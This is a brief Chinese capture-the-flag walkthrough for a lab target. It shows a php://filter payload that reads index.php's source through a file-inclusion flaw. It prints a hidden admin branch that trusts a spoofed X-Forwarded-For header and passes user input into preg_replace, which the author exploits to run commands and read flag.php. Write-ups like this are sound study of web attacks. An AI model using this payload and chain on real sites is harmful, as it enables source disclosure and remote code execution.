打开靶机
只有设备维护中心可以点开
点标签得到新的url
page=index
想到文件包含漏洞(URL中出现path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼
利用php伪协议查看源码 出现一段base64源码,进行转码得出源码
?page=php://filter/read=convert.base64-encode/resource=index.php
得到base64的内容 解密
利用工具进行解密
发现代码入口
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
javascript
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
出现 Welcome My Admin! 证明伪造成功
通过构建命令 找到flag文件
发现是目录,
Cat flag.php
得到flag